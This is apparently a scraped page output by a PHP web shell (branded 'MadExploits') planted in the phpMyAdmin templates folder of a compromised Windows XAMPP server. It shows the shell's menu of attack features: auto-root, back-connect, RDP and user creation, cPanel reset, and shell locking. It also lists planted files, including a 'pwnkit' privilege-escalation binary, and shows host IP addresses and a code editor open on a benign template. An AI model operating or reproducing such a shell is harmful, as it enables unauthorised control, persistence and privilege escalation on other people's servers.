Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.9
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
table /
tracking /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
index.twig
335
B
-rw-rw-rw-
main.twig
5.98
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
report_table.twig
1.03
KB
-rw-rw-rw-
structure_snapshot_columns.twi...
2.31
KB
-rw-rw-rw-
structure_snapshot_indexes.twi...
1.22
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : structure_snapshot_columns.twig
<h3>{% trans 'Structure' %}</h3> <table id="tablestructure" class="table table-striped table-hover w-auto"> <thead> <tr> <th>{% trans %}#{% context %}Number{% endtrans %}</th> <th>{% trans 'Column' %}</th> <th>{% trans 'Type' %}</th> <th>{% trans 'Collation' %}</th> <th>{% trans 'Null' %}</th> <th>{% trans 'Default' %}</th> <th>{% trans 'Extra' %}</th> <th>{% trans 'Comment' %}</th> </tr> </thead> <tbody> {% set index = 1 %} {% for field in columns %} <tr class="noclick"> <td>{{ index }}</td> {% set index = index + 1 %} <td> <strong> {{ field['Field'] }} {% if field['Key'] == 'PRI' %} {{ get_image('b_primary', 'Primary'|trans) }} {% elseif field['Key'] is not empty %} {{ get_image('bd_primary', 'Index'|trans) }} {% endif %} </strong> </td> <td>{{ field['Type'] }}</td> <td>{{ field['Collation'] }}</td> <td>{{ field['Null'] == 'YES' ? 'Yes'|trans : 'No'|trans }}</td> <td> {% if field['Default'] is defined %} {% set extracted_columnspec = extract_column_spec(field['Type']) %} {% if extracted_columnspec['type'] == 'bit' %} {# here, $field['Default'] contains something like b'010' #} {{ field['Default']|convert_bit_default_value }} {% else %} {{ field['Default'] }} {% endif %} {% else %} {% if field['Null'] == 'YES' %} <em>NULL</em> {% else %} <em>{% trans %}None{% context %}None for default{% endtrans %}</em> {% endif %} {% endif %} </td> <td>{{ field['Extra'] }}</td> <td>{{ field['Comment'] }}</td> </tr> {% endfor %} </tbody> </table>
Close